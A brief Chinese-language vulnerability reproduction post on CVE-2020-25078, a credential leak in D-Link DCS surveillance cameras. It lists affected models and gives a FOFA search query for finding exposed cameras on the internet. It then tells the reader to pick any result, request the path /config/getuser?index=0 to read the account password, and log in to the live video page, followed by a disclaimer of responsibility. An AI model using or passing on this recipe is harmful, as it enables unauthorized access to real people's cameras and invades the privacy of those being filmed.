简介:
漏洞编号:CVE-2020-25078
D-Link DCS是网络监控摄像机设备,通过访问特定的URL可以得到账号密码信息,攻击方可以
直接进入利用漏洞得到账户密码直接进入后台获取视频监控页面。
影响版本:
DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703
漏洞复现:
fofa直接搜索:
app="D_Link-DCS-2530L"
可以看到还是很多的。
随便点进去一个;看到需要认证登录:
漏洞拼接路径:
/config/getuser?index=0
利用得到的账户密码登录即可。
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。